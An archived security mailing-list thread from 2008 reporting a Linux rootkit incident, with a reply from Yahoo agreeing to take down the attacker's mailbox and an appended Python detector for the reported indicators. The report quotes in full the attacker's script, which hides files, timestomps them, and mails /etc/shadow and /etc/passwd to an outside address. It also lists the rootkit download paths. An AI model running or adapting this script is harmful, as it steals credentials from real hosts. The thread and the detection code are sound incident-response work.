[nsp-sec] Yahoo email address catching password files - rootkit hosted at AS 21844

Dave Mitchell davem at yahoo-inc.com
Fri Oct 10 16:22:25 EDT 2008


Ack, Yahoo. We'll get it taken down immediately.

-dave

On Fri, Oct 10, 2008 at 02:09:25PM -0400, Daniel Adinolfi wrote:
> ----------- nsp-security Confidential --------
>
> Folks,
>
> We have a major incident here involving a number of linux hosts.  The 
> script that gets run by the bad guys sends the /etc/passwd and /etc/shadow 
> files (along with some other tidbits) to a particular yahoo.com email 
> address.  It also installs a trojaned sshd and installs dsniff.
>
> The email address in question is cc.cappy at yahoo.com.  Can someone at Yahoo 
> please take down this address?
>
> The root kit is available here:
>
> webbuild.org
>
> which is currently at 75.125.198.200.
>
> AS      | IP               | AS Name
> 21844   | 75.125.198.200   | THEPLANET-AS - ThePlanet.com Internet Services, Inc.
> PEER_AS | IP               | AS Name
> 2914    | 75.125.198.200   | NTT-COMMUNICATIONS-2914 - NTT America, Inc.
> 3356    | 75.125.198.200   | LEVEL3 Level 3 Communications
> 3561    | 75.125.198.200   | SAVVIS - Savvis
> 4565    | 75.125.198.200   | MEGAPATH2-US - MegaPath Networks Inc.
> 6461    | 75.125.198.200   | MFNX MFN - Metromedia Fiber Network
> 7922    | 75.125.198.200   | DNEO-OSP3 - Comcast Cable Communications, Inc.
>
> The following files are downloaded after the compromise, which we believe 
> is through X-Windows.
>
> WGET /.web/ssh.tgz
> WGET /.web/sniff.tgz
> WGET /.web/clean
>
> ssh.tgz is an sshd replacement.  sniff.tgz is dsniff.
>
> This is the script that was run to send the password and system info:
> ________________________
>
> dir=`pwd`
> mkdir /var/spool/.mail
> mv snif2/* /var/spool/.mail
> touch -acmr /usr/sbin/sshd /var/spool/.mail/*
> cd /var/spool/.mail
> ./start
>
> cd $dir
> echo "[+]Sending root information"
> echo "##########hostname##########" >> mail
> hostname -f >> mail
> hostname -i >> mail
> echo "##########shadow list##########" >> mail
> cat /etc/shadow >> mail
> echo "##########passwd list##########" >> mail
> cat /etc/passwd >>mail
> echo "##########ifconfig##########" >> mail
> /sbin/ifconfig | grep inet >> mail
> echo "##########kernel type##########" >> mail
> uname -a >> mail
> echo "Os system" >> mail
> cat /etc/issue >> mail
> echo "sending mail"
> mail cc.cappy at yahoo.com -s "$(hostname -f)" < mail
> cd ..
> rm -rf sniff
> rm -rf sniff.tgz
>
> ___________________________
>
> If folks would like more info, please feel free to contact me directly.
>
> Thanks.
>
> -Dan
>
>
> _________________
> Daniel Adinolfi, CISSP
> Senior Security Engineer, IT Security Office
> Cornell University - Office of Information Technologies
> email: dra1 at cornell.edu   phone: 607-255-7657
>
>
>
>
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
>
> Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
> community. Confidentiality is essential for effective Internet security counter-measures.
> _______________________________________________
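The indicators in Dan's report (the staging host and its IP, the three /.web/ downloads, the /var/spool/.mail drop directory, the `touch -acmr /usr/sbin/sshd` timestamp copy, and the section headers the script writes before dumping /etc/shadow and /etc/passwd) can be turned into log and host checks. The following is an added example written for this archive page, not code from either poster. The proxy log lines, the mail body, the file names under /var/spool/.mail and the timestamps are constructed samples, and every function name is my own.

```python
"""Defender-side checks for the indicators quoted in the nsp-security report.
Added example, not the list's or the reporter's code.  Indicator strings are
taken verbatim from the report; all sample data below is constructed."""
import os
from typing import Iterable, List, Tuple

# Indicators quoted from the report.
STAGING_HOST = "webbuild.org"
STAGING_IP = "75.125.198.200"
DOWNLOAD_PATHS = ("/.web/ssh.tgz", "/.web/sniff.tgz", "/.web/clean")
HIDDEN_DIR = "/var/spool/.mail"
REFERENCE_BINARY = "/usr/sbin/sshd"
EXFIL_MARKERS = ("##########shadow list##########",
                 "##########passwd list##########")


def find_fetches(log_lines: Iterable[str]) -> List[Tuple[int, str]]:
    """Scan proxy/web log lines for the staging host, its IP, or any of the
    three download paths.  Returns (line_number, comma-joined reasons)."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        reasons = []
        if STAGING_HOST in line:
            reasons.append("host")
        if STAGING_IP in line:
            reasons.append("ip")
        reasons.extend(p for p in DOWNLOAD_PATHS if p in line)
        if reasons:
            hits.append((n, ",".join(reasons)))
    return hits


def looks_like_exfil_mail(body: str) -> bool:
    """True when an outbound message carries the section headers the script
    writes before dumping /etc/shadow and /etc/passwd.  Useful on a mail
    queue or an outbound SMTP capture; the markers are distinctive enough
    to alert on without parsing the shadow lines that follow them."""
    return all(marker in body for marker in EXFIL_MARKERS)


def timestomped_siblings(reference: Tuple[int, int],
                         files: Iterable[Tuple[str, int, int]]) -> List[str]:
    """`touch -acmr /usr/sbin/sshd <files>` copies sshd's atime and mtime onto
    the dropped files.  Given sshd's (atime, mtime) and (path, atime, mtime)
    for files in a suspect directory, return the paths whose stamps match
    sshd to the second.  Unrelated files rarely share both exactly."""
    return [path for path, atime, mtime in files if (atime, mtime) == reference]


def stat_times(path: str) -> Tuple[int, int]:
    """Whole-second (atime, mtime) of a real file, for live use of the check."""
    st = os.stat(path)
    return int(st.st_atime), int(st.st_mtime)


# Constructed sample data (not from the report): three fetches and one benign line.
SAMPLE_LOG = [
    "Oct 10 13:51:02 proxy squid: 10.1.2.3 GET http://webbuild.org/.web/ssh.tgz 200",
    "Oct 10 13:51:04 proxy squid: 10.1.2.3 GET http://75.125.198.200/.web/sniff.tgz 200",
    "Oct 10 13:51:09 proxy squid: 10.1.2.3 GET http://webbuild.org/.web/clean 200",
    "Oct 10 13:52:00 proxy squid: 10.1.2.9 GET http://example.org/index.html 200",
]

# Constructed mail body shaped like the script's output; the hash is a dummy.
SAMPLE_MAIL = "\n".join([
    "##########hostname##########",
    "victim.example.edu",
    "##########shadow list##########",
    "root:$1$constructed$notarealhashxxxxxxxxxxx:14162:0:99999:7:::",
    "##########passwd list##########",
    "root:x:0:0:root:/root:/bin/bash",
])

# Constructed stamps: two dropped files cloned from sshd, one file with its own time.
SSHD_TIMES = (1200000000, 1200000000)
SAMPLE_FILES = [
    ("/var/spool/.mail/start", 1200000000, 1200000000),
    ("/var/spool/.mail/sniffer.log", 1200000000, 1200000000),
    ("/var/spool/.mail/README", 1223660000, 1223660000),
]

if __name__ == "__main__":
    print("fetches:", find_fetches(SAMPLE_LOG))
    print("exfil mail:", looks_like_exfil_mail(SAMPLE_MAIL))
    print("timestomped:", timestomped_siblings(SSHD_TIMES, SAMPLE_FILES))
    # Live check: only meaningful on a Linux host where the drop directory exists.
    if os.path.isdir(HIDDEN_DIR) and os.path.exists(REFERENCE_BINARY):
        live = [(os.path.join(HIDDEN_DIR, f), *stat_times(os.path.join(HIDDEN_DIR, f)))
                for f in os.listdir(HIDDEN_DIR)]
        print("live timestomped:", timestomped_siblings(stat_times(REFERENCE_BINARY), live))
```

The three functions are pure so they can be pointed at a proxy log export, a mail queue dump, or a directory listing from a suspect host without running anything there; the `__main__` block only touches the local filesystem when /var/spool/.mail already exists. The timestamp check is the one worth keeping beyond this incident: exact atime/mtime equality with an unrelated system binary is a generic sign of `touch -r` style timestomping.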